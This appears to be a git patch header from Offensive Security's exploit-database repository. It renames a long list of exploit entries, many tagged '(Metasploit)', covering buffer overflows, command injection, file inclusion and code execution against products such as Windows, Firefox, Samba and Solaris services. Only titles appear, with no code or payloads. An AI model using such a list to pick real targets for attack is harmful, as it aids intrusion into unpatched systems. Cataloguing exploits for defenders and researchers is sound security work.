From 70d97f91c1a6afbe633dc27d316d0943ac2efbec Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 28 Jul 2016 05:03:16 +0000 Subject: [PATCH] DB: 2016-07-28 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2 new exploits Multiple AntiVirus (zip file) Detection Bypass Exploit Multiple AntiVirus - .zip Detection Bypass Exploit RealPlayer 10 - (.smil File) Local Buffer Overflow Exploit RealPlayer 10 - (.smil) Local Buffer Overflow Exploit Veritas Backup Exec - Remote File Access Exploit (Windows) Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit) ZENworks 6.5 Desktop/Server Management Remote Stack Overflow MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit (Metasploit) Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit) WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit (Metasploit) Opera <= 8.02 - Remote Denial of Service Exploit Opera <= 8.02 - Remote Denial of Service Exploit (1) MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit Google Search Appliance - proxystylesheet XSLT Java Code Execution MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit (Metasploit) Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit) Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit Lyris ListManager - Read Message Attachment SQL Injection Exploit Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit (Metasploit) Lyris ListManager - Read Message Attachment SQL Injection Exploit (Metasploit) Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux) Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux) (Metasploit) Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit) Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit) Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit) Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow (Metasploit) Microsoft Visual Studio 6.0 sp6 - (Malformed .dbp File) Buffer Overflow Exploit Microsoft Visual Studio 6.0 sp6 - (.dbp) Buffer Overflow Exploit Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit Symantec Sygate Management Server - (login) SQL Injection Exploit Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit (Metasploit) Symantec Sygate Management Server - (login) SQL Injection Exploit (Metasploit) Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit (Metasploit) Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit) Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (Metasploit) eIQnetworks License Manager Remote Buffer Overflow Exploit (1262) eIQnetworks License Manager Remote Buffer Overflow Exploit (494) eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit) eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (2) eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit) (2) Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit) Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2) Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2) IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit (Metasploit) Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040) Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit) Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit (Metasploit) McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit) PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32) PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32) (Metasploit) Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept (Metasploit) VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (Metasploit) VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit (Metasploit) VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit Windows Media Player 9/10 - (MID File) Denial of Service Exploit Windows Media Player 9/10 - (.MID) Denial of Service Exploit NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit (Metasploit) Oreon <= 1.2.3 RC4 - (lang/index.php file) Remote Inclusion Oreon <= 1.2.3 RC4 - (lang/index.php) Remote Inclusion Magic CMS 4.2.747 - (mysave.php file) Remote File Include Magic CMS 4.2.747 - (mysave.php) Remote File Include WebLog (index.php file) Remote File Disclosure WebLog (index.php) Remote File Disclosure Pathos CMS 0.92-2 - (warn.php file) Remote File Inclusion Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion Zomplog 3.8 - (force_download.php file) Remote File Disclosure Zomplog 3.8 - (force_download.php) Remote File Disclosure Winamp <= 5.3 - (WMV File) Remote Denial of Service Exploit Winamp <= 5.3 - (.WMV) Remote Denial of Service Exploit Opera 9.2 - (torrent File) Remote Denial of Service Exploit Opera 9.2 - (.torrent) Remote Denial of Service Exploit JulmaCMS 1.4 - (file.php file) Remote File Disclosure JulmaCMS 1.4 - (file.php) Remote File Disclosure PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit Virtual DJ 5.0 - (.m3u) Local Buffer OverFlow Exploit OTSTurntables 1.00 - (.m3u) Local Buffer Overflow Exploit AtomixMP3 2.3 - (pls File) Local Buffer OverFlow Exploit AtomixMP3 2.3 - (.pls) Local Buffer OverFlow Exploit helplink 0.1.0 - (show.php file) Remote File Inclusion helplink 0.1.0 - (show.php) Remote File Inclusion jetAudio 7.x - (m3u File) Local SEH Overwrite Exploit jetAudio 7.x - (m3u) Local SEH Overwrite Exploit FireConfig 0.5 - (dl.php file) Remote File Disclosure FireConfig 0.5 - (dl.php) Remote File Disclosure Sony CONNECT Player 4.x - (m3u File) Local Stack Overflow Exploit Sony CONNECT Player 4.x - (.m3u) Local Stack Overflow Exploit phpCMS 1.2.2 - (parser.php file) Remote File Disclosure phpCMS 1.2.2 - (parser.php) Remote File Disclosure ChartDirector 4.1 - (viewsource.php file) File Disclosure ChartDirector 4.1 - (viewsource.php) File Disclosure IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl) IntelliTamper 2.07 - (.map) Local Arbitrary Code Execution Exploit (Perl) Acoustica Mixcraft <= 4.2 Build 98 - (mx4 file) Local BoF Exploit Acoustica Mixcraft <= 4.2 Build 98 - (mx4) Local BoF Exploit Acoustica MP3 CD Burner 4.51 Build 147 - (asx file) Local BoF Exploit Acoustica MP3 CD Burner 4.51 Build 147 - (.asx) Local BoF Exploit Acoustica Beatcraft 1.02 Build 19 - (bcproj file) Local BoF Exploit Acoustica Beatcraft 1.02 Build 19 - (.bcproj) Local BoF Exploit Microsoft Windows Explorer - (.zip File) Denial of Service Exploit Microsoft Windows Explorer - (.zip) Denial of Service Exploit Kusaba <= 1.0.4 - Remote Code Execution Exploit Kusaba <= 1.0.4 - Remote Code Execution Exploit (1) Cain & Abel 4.9.23 - (rdp file) Buffer Overflow PoC Cain & Abel 4.9.23 - (.rdp) Buffer Overflow PoC Electronics Workbench (EWB File) Local Stack Overflow PoC Electronics Workbench (.EWB) Local Stack Overflow PoC Cain & Abel 4.9.23 - (rdp file) Buffer Overflow Exploit Cain & Abel 4.9.23 - (.rdp) Buffer Overflow Exploit autositephp 2.0.3 - (LFI/CSRF/edit file) Multiple Vulnerabilities autositephp 2.0.3 - (LFI/CSRF/Edit file) Multiple Vulnerabilities CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (Python) CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit (Python) SAWStudio 3.9i (prf File) Local Buffer Overflow PoC SAWStudio 3.9i - (.prf) Local Buffer Overflow PoC IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit IntelliTamper 2.07/2.08 - (.MAP) Local SEH Overwrite Exploit Hex Workshop 5.1.4 - (Color Mapping File) Local Buffer Overflow PoC Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow PoC Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC Destiny Media Player 1.61 - (.lst) Local Buffer Overflow PoC Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2) Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (3) Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (2) Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (3) Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4) Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5) Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (4) Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (5) VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit VUPlayer 2.49 - (.pls) Universal Buffer Overflow Exploit ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit Zinf Audio Player 2.2.1 - (PLS File) Stack Overflow PoC Zinf Audio Player 2.2.1 - (PLS File) Local Buffer Overflow Exploit (univ) Zinf Audio Player 2.2.1 - (M3U FILE) Local Heap Overflow PoC Zinf Audio Player 2.2.1 - (gqmpeg File) Buffer Overflow PoC Zinf Audio Player 2.2.1 - (.pls) Stack Overflow PoC Zinf Audio Player 2.2.1 - (.pls) Local Buffer Overflow Exploit (univ) Zinf Audio Player 2.2.1 - (.M3U) Local Heap Overflow PoC Zinf Audio Player 2.2.1 - (.gqmpeg) Buffer Overflow PoC Thomson mp3PRO Player/Encoder (M3U File) Crash PoC Thomson mp3PRO Player/Encoder - (.M3U) Crash PoC Spider Player 2.3.9.5 - (asx File) off by one Crash Exploit Spider Player 2.3.9.5 - (.asx) off by one Crash Exploit Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC Elecard AVC HD PLAYER - (.m3u/.xpl) Local Stack Overflow PoC Nokia N95-8 - (.JPG File) Remote Crash PoC Nokia N95-8 - (.JPG) Remote Crash PoC Media Commands (m3u File) Local SEH Overwrite Exploit Media Commands (.m3u) Local SEH Overwrite Exploit Media Commands (m3u File) Universal SEH Overwrite Exploit Media Commands (.m3u) Universal SEH Overwrite Exploit MediaCoder 0.6.2.4275 - (m3u File) Universal Stack Overflow Exploit MediaCoder 0.6.2.4275 - (.m3u) Universal Stack Overflow Exploit VUPlayer <= 2.49 - (.cue) Universal Buffer Overflow Exploit VUPlayer 2.49 - (.cue) Universal Buffer Overflow Exploit Gretech GOM Encoder 1.0.0.11 - (Subtitle File) Buffer Overflow PoC Gretech GOM Encoder 1.0.0.11 - (.Subtitle) Buffer Overflow PoC Abee Chm Maker 1.9.5 - (CMP File) Stack Overflow Exploit PowerCHM 5.7 - (hhp File) Stack Overflow poC Abee Chm Maker 1.9.5 - (.CMP) Stack Overflow Exploit PowerCHM 5.7 - (.hhp) Stack Overflow poC Apollo 37zz (M3u File) Local Heap Overflow PoC Apollo 37zz - (.m3u) Local Heap Overflow PoC mpegable Player 2.12 - (YUV File) Local Stack Overflow PoC mpegable Player 2.12 - (.YUV) Local Stack Overflow PoC Rama CMS <= 0.9.8 - (download.php file) File Disclosure Rama CMS <= 0.9.8 - (download.php) File Disclosure compface <= 1.5.2 - (XBM File) Local Buffer Overflow PoC compface <= 1.5.2 - (.XBM) Local Buffer Overflow PoC MP3-Nator 2.0 - (plf File) Universal Buffer Overflow Exploit (SEH) MP3-Nator 2.0 - (.plf) Universal Buffer Overflow Exploit (SEH) PatPlayer 3.9 - (M3U File) Local Heap Overflow PoC PatPlayer 3.9 - (.M3U) Local Heap Overflow PoC QuickDev 4 - (download.php file) File Disclosure QuickDev 4 - (download.php) File Disclosure FoxPlayer 1.1.0 - (m3u File) Local Buffer Overflow PoC FoxPlayer 1.1.0 - (.m3u) Local Buffer Overflow PoC Microsoft Windows 2003 - (EOT File) BSOD Crash Exploit Microsoft Windows 2003 - (.EOT) BSOD Crash Exploit VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH) Audio Lib Player (.m3u) Buffer Overflow Exploit (SEH) MP3 Collector 2.3 - (m3u File) Local Crash PoC MP3 Collector 2.3 - (.m3u) Local Crash PoC BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC BigAnt Server 2.50 SP1 - (.ZIP) Local Buffer Overflow PoC BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2) BigAnt Server <= 2.50 SP6 - (.ZIP) Local Buffer Overflow PoC (2) XM Easy Personal FTP Server <= 5.8.0 DoS XM Easy Personal FTP Server <= 5.8.0 DoS (Metasploit) Symantec ConsoleUtilities ActiveX Buffer Overflow Symantec ConsoleUtilities ActiveX Buffer Overflow (Metasploit) Nagios3 statuswml.cgi Command Injection Nagios3 statuswml.cgi Command Injection (Metasploit) httpdx 1.4 - h_handlepeer BoF httpdx 1.4 - h_handlepeer BoF (Metasploit) Mambo 4.6.4 - Cache Lite Output Remote File Inclusion Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit) BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection Cacti 0.8.6-d graph_view.php Command Injection AWStats 6.2-6.1 - configdir Command Injection ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution SpamAssassin spamd <= 3.1.3 - Command Injection DistCC Daemon - Command Execution ContentKeeper Web Appliance < 125.10 Command Execution Solaris in.telnetd TTYPROMPT - Buffer Overflow Solaris 10 / 11 Telnet - Remote Authentication Bypass Solaris sadmind adm_build_path - Buffer Overflow Solaris <= 8.0 - LPD Command Execution BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit) AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit) Cacti 0.8.6-d graph_view.php Command Injection (Metasploit) AWStats 6.2-6.1 - configdir Command Injection (Metasploit) ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit) SpamAssassin spamd <= 3.1.3 - Command Injection (Metasploit) DistCC Daemon - Command Execution (Metasploit) ContentKeeper Web Appliance < 125.10 Command Execution (Metasploit) Solaris in.telnetd TTYPROMPT - Buffer Overflow (Metasploit) Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit) Solaris sadmind adm_build_path - Buffer Overflow (Metasploit) Solaris <= 8.0 - LPD Command Execution (Metasploit) Solaris 8 dtspcd - Heap Overflow Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X) Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X) Solaris 8 dtspcd - Heap Overflow (Metasploit) Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X) (Metasploit) Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X) (Metasploit) mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X) WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X) Mail.App 10.5.0 - Image Attachment Command Execution (OS X) Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X) AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X) (Metasploit) WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X) (Metasploit) Mail.App 10.5.0 - Image Attachment Command Execution (OS X) (Metasploit) Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X) (Metasploit) AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) (Metasploit) Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit) Wyse Rapport Hagent Fake Hserver - Command Execution Subversion 1.0.2 - Date Overflow Samba 2.2.x - nttrans Overflow RealServer 7-9 Describe Buffer Overflow PHP < 4.5.0 - unserialize Overflow ntpd 4.0.99j-k readvar - Buffer Overflow Veritas NetBackup - Remote Command Execution HP OpenView OmniBack II A.03.50 - Command Executino Apple Quicktime for Java 7 - Memory Access Opera 9.50 / 9.61 historysearch - Command Execution Opera <= 9.10 Configuration Overwrite Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit Firefox 3.5 - escape Memory Corruption Exploit Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow Squid 2.5.x / 3.x - NTLM Buffer Overflow Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow Borland InterBase 2007 - PWD_db_aliased Buffer Overflow Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) Subversion 1.0.2 - Date Overflow (Metasploit) Samba 2.2.x - nttrans Overflow (Metasploit) RealServer 7-9 Describe Buffer Overflow (Metasploit) PHP < 4.5.0 - unserialize Overflow (Metasploit) ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit) Veritas NetBackup - Remote Command Execution (Metasploit) HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit) Apple Quicktime for Java 7 - Memory Access (Metasploit) Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit) Opera <= 9.10 Configuration Overwrite (Metasploit) Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit) Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit) Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit (Metasploit) Firefox 3.5 - escape Memory Corruption Exploit (Metasploit) Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit) Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit) Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit) MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow (Metasploit) Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit) HP Release Control Authenticated XXE HP Release Control Authenticated XXE (Metasploit) Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit) Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit) Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow University of Washington - imap LSUB Buffer Overflow Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit PeerCast <= 0.1216 Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit) Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit) University of Washington - imap LSUB Buffer Overflow (Metasploit) Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit) PeerCast <= 0.1216 (Metasploit) Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit) Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection Unreal Tournament 2004 - 'Secure' Overflow Irix LPD tagprinter - Command Execution HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution Xtacacsd <= 4.1.2 - report Buffer Overflow System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) Mercantec SoftCart 4.00b - CGI Overflow Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection (Metasploit) Unreal Tournament 2004 - 'Secure' Overflow (Metasploit) Irix LPD tagprinter - Command Execution (Metasploit) HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit) Xtacacsd <= 4.1.2 - report Buffer Overflow (Metasploit) System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) (Metasploit) Mercantec SoftCart 4.00b - CGI Overflow (Metasploit) Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit) M3U To ASX-WPL 1.1 - (m3u Playlist file) Buffer Overflow Exploit HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit Audacity 1.2.6 - (gro File) Buffer Overflow Exploit M3U To ASX-WPL 1.1 - (.m3u) Buffer Overflow Exploit HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit Audacity 1.2.6 - (.gro) Buffer Overflow Exploit HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Metasploit) HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (Metasploit) Millenium MP3 Studio 2.0 - (PLS File) Universal Stack Overflow (Metasploit) Millenium MP3 Studio 2.0 - (.pls) Universal Stack Overflow (Metasploit) Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (1) Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (Metasploit) (1) Audiotran 1.4.1 - (PLS File) Stack Overflow (Metasploit) Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit) OpenOffice - (.slk File) Parsing Null Pointer OpenOffice - (.slk) Parsing Null Pointer MediaCoder - (.lst file) Local Buffer Overflow Exploit MediaCoder - (.lst) Local Buffer Overflow Exploit VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass) VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass) ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass) ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass) (Metasploit) Mediacoder 0.7.3.4682 - (.m3u File) Universal Buffer Overflow Exploit Mediacoder 0.7.3.4682 - (.m3u) Universal Buffer Overflow Exploit Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit) Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit (Metasploit) VUPlayer - M3U Buffer Overflow VUPlayer - (.m3u) Buffer Overflow (Metasploit) Audiotran 1.4.1 - (PLS File) Stack Buffer Overflow Audiotran 1.4.1 - (.pls) Stack Buffer Overflow HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (1) HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (1) Millenium MP3 Studio 2.0 - (PLS File) Stack Buffer Overflow Millenium MP3 Studio 2.0 - (.pls) Stack Buffer Overflow VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow VariCAD 2010-2.05 EN - (.DWB) Stack Buffer Overflow HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (2) HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (2) ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow ProShow Gold 4.0.2549 - (.PSH) Stack Buffer Overflow VUPlayer - CUE Buffer Overflow VUPlayer - (.cue) Buffer Overflow (Metasploit) AstonSoft DeepBurner (DBR File) Path Buffer Overflow AstonSoft DeepBurner - (.DBR) Path Buffer Overflow HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (3) HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (3) Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow Zinf Audio Player 2.2.1 - (.pls) Stack Buffer Overflow MikeyZip 1.1 - (.zip File) Buffer Overflow MikeyZip 1.1 - (.zip) Buffer Overflow Windows - DNS Reverse Download and Exec Shellcode Windows - DNS Reverse Download and Exec Shellcode (Metasploit) Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter) Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter) (Metasploit) Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit (Metasploit) If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (2) If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2) Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053) Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053) (Metasploit) MicroP 0.1.1.1600 - (MPPL File) Stack Buffer Overflow MicroP 0.1.1.1600 - (.MPPL) Stack Buffer Overflow Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit) HP JetDirect PJL Interface Universal Path Traversal HP JetDirect PJL Query Execution HP JetDirect PJL Interface Universal Path Traversal (Metasploit) HP JetDirect PJL Query Execution (Metasploit) Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit) LifeSize Room - Command Injection LifeSize Room - Command Injection (Metasploit) Opera 10/11 - (bad nesting with frameset tag) Memory Corruption Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit) Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day) Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day) (Metasploit) Cytel Studio 9.0 - (CY3 File) Stack Buffer Overflow Cytel Studio 9.0 - (.CY3) Stack Buffer Overflow NJStar Communicator 3.00 MiniSMTP Server Remote Exploit NJStar Communicator 3.00 MiniSMTP Server Remote Exploit (Metasploit) KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass) KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass) (Metasploit) AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit) QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit) Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u) CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u) (Metasploit) AVID Media Composer Phonetic Indexer Remote Stack BoF Final Draft 8 - Multiple Stack Buffer Overflows AVID Media Composer Phonetic Indexer Remote Stack BoF (Metasploit) Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit) StoryBoard Quick 6 - Stack Buffer Overflow StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit) phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection (Metasploit) vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit (Metasploit) The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution (Metasploit) Liferay XSL - Command Execution 